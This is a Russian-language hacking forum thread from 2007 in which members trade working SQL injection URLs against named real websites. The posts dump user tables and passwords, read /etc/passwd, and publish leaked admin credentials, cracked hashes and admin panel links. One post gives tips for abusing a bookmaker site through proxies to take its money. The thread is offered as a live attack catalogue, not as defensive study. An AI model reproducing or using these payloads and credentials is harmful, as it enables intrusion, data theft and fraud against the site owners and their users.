SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    www.icps.kiev.ua

    Центр какихто там исследователей "есть ли жизнь на Марсе, нет ли жизни на Марсе"
    Code:
    http://www.icps.kiev.ua/news.html?id=-1+union+select+1,version(),3,4,5/*
     
    2 people like this.
  2. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.kornid.is/fullgallery.php?id=-10+union+select+1,2,3,4,5,6,concat(password,0x3a,username),8+from+users/*&stat=sale
    http://www.kornid.is/admin/
    pass:dagmar
    login:1
    Code:
    http://www.fbjork.is/index.php?id=-483+union+select+1,2,3,version(),database(),6,7/*
     
    2 people like this.
  3. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.swift.ru/index.php?n=1&f=5&id=-1+union+select+1,2,0x2a2a2a4441204879204841585045482a2a2a203a2d28,4,5,6,7,8,9,10/*
     
    2 people like this.
  4. valiko

    valiko Elder - Старейшина

    Joined:
    28 Jan 2007
    Messages:
    152
    Likes Received:
    144
    Reputations:
    19
    Code:
    http://www.cronica.com.mx./nota.php?id_nota=-249802+union+select+1,2,3,4,5,concat(user(),0x3a,database(),0x3a,version())/*
     
    3 people like this.
  5. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.fbm.ru/main.php?n=2&f=47&mt=0.27036300%201174418216&num=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11/*

    http://www.fbm.ru/main.php?n=2&f=47&mt=0.27036300%201174418216&num=-1+union+select+1,load_file('/tmp/ww.php'),3,4,5,6,7,8,9,10,11/*
     
  6. valiko

    valiko Elder - Старейшина

    Joined:
    28 Jan 2007
    Messages:
    152
    Likes Received:
    144
    Reputations:
    19
    Code:
    http://videos.cooltax.net/view.php?id=-163442'+union+select+1,2,3,concat(user,0x3a,password),5,database(),7,version(),9,0+from+mysql.user/*
    root:*CD11B1921012CA99693A28BF0D822D4E5D9E120D
     
  7. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Code:
    http://www.debtwatch.org/es/inicio/enprofunditat/plantilla_1.php?identif=-1+union+select+1,2,3,4,user(),6,version(),8,9,10,11/*
    Code:
    http://www.europa-kherson.com/news/news.php?identif=-1+union+select+1,user(),version(),4/*
    Code:
    http://www.joseepedroalmeida.com/pombosdetalhe.php?identif=-1+union+select+1,user(),version(),database(),5,6/*
     
  8. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    onboard.ru
    Code:
    http://www.onboard.ru/talkabout/show.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.tables/*
    upd:

    Code:
    http://fat-cat.co.uk/fatcat/artistInfo.php?id=-1+union+select+1,concat_ws(0x3a,username,password,email),3,4,5,6+from+users+limit+0,1/*
    ~500 юзеров, логин:пасс:мэйл в чистом виде, пароли от форума. есть еще доступ к таблице mysql.user, столбцы не подбирал..

    etc/passwd
    Code:
    http://fat-cat.co.uk/fatcat/artistInfo.php?id=-1+union+select+1,LOAD_FILE(0x2F6574632F706173737764),3,4,5,6
    upd2:
    название базы улыбнуло :)
    Code:
    http://www.superherohype.com/news/topnews.php?id=-1+union+select+database()/*
     
    #1188 n1†R0x, 21 Mar 2007
    Last edited: 21 Mar 2007
  9. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    reererer
     
  10. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.isaacmizrahiny.com/slideshow.php?id=-86%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(username,0x3a,password),15,16,17,18,19,20,21,22+from+users/*
    
     
    1 person likes this.
  11. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    Code:
    http://www.vesnaupi.ru/cross/gallery.php?dep=4&gal=4&pos=&id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
     
    1 person likes this.
  12. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    www.bukmekers.com
    Букмекерская контора

    Code:
    http://bukmekers.com/index.php?option=com_user&task=doStakeMenu&cid=-1+union+select+1,concat(database(),char(58),user(),char(58),version())+from+INFORMATION_SCHEMA.TABLES/*
    1) Скуля действует только от зарегестрированного пользователя;
    2) Регестрируйте юзера только под проксями));
    3) Имена таблиц ищите только под проксями;
    4) Ваш акк могут через какое-то время забанить, ну потом зареганите другой));
    5) Далее, как деньги слить думаю разберетесь.

    Удачи.
     
    4 people like this.
  13. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    mssql

    Code:
    http://www.stud-info.com/shop/ozon/book/zakaz.asp?id=-1+union+all+select+1,2,3,4,5,6,table_name,8,9,10,11+from+information_schema.tables--
    mysql

    Code:
    http://www.vtv.gcg.ru/konkurs/?konkurs=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),char(58),user(),char(58),version())/*
     
    3 people like this.
  14. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.onlineflashgamez.com/index.php?action=playgame&gameid=-1+union+select+1,concat_ws(0x3a,username,password,emailaddress),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+users+limit+0,1/*
    admin:dbc50ecb629ac64cc2fdad7bede9daf2: [email protected]

    dbc50ecb629ac64cc2fdad7bede9daf2 = 1qa2ws
    http://www.onlineflashgamez.com/admin/index.php
    :)
     
    #1194 n1†R0x, 21 Mar 2007
    Last edited: 21 Mar 2007
    2 people like this.
  15. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Code:
    http://state.rin.ru/cgi-bin/news.pl?id=-118107+union+select+1,2,concat_ws(char(58),name,login),4+from+users/*
    вот тут с табличкой пришлось напрячься=\
    Code:
    http://shop.vashtextil.com.ua/main.php?id=-7'+union+select+1,id,3,4+from+tbl_main/*
     
    4 people like this.
  16. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    telemir.com.ua

    Code:
    http://telemir.com.ua/news/news.html?id=-1+union+select+1,2,concat(user_name,char(58),user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users/*
    Admin:Admin мда...


    http://telemir.com.ua/admin - убогейшая, вообще ничего нету =(
     
    2 people like this.
  17. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    dorian.ru
    Code:
    http://www.dorian.ru/catalog/dog.php?screen=1&id=-1+union+select+concat(name,0x3a,password),2,3,4,5,6+from+users+limit+0,1/*
    admin:e10adc3949ba59abbe56e057f20f883e
    upd: pass=123456
     
    #1197 n1†R0x, 21 Mar 2007
    Last edited: 21 Mar 2007
    1 person likes this.
  18. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    gostudy.com.ua

    нимагу больше =((

    HTML:
    Error in query The used SELECT statements have a different number of columns
    Code:
    http://gostudy.com.ua/view.phtml?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102/*
     
  19. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    вот, немножко в другом месте ;)
    вывод в title http://gostudy.com.ua/forum.phtml?theme_id=-61+union+select+database()+from+users/*
     
    3 people like this.
  20. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Так и не подобрал таблицу с пользователями(

    Code:
    http://books.inmsk.ru/full_descript.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,convert(database(),char),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57/*
     
    1 person likes this.
Thread Status:
Not open for further replies.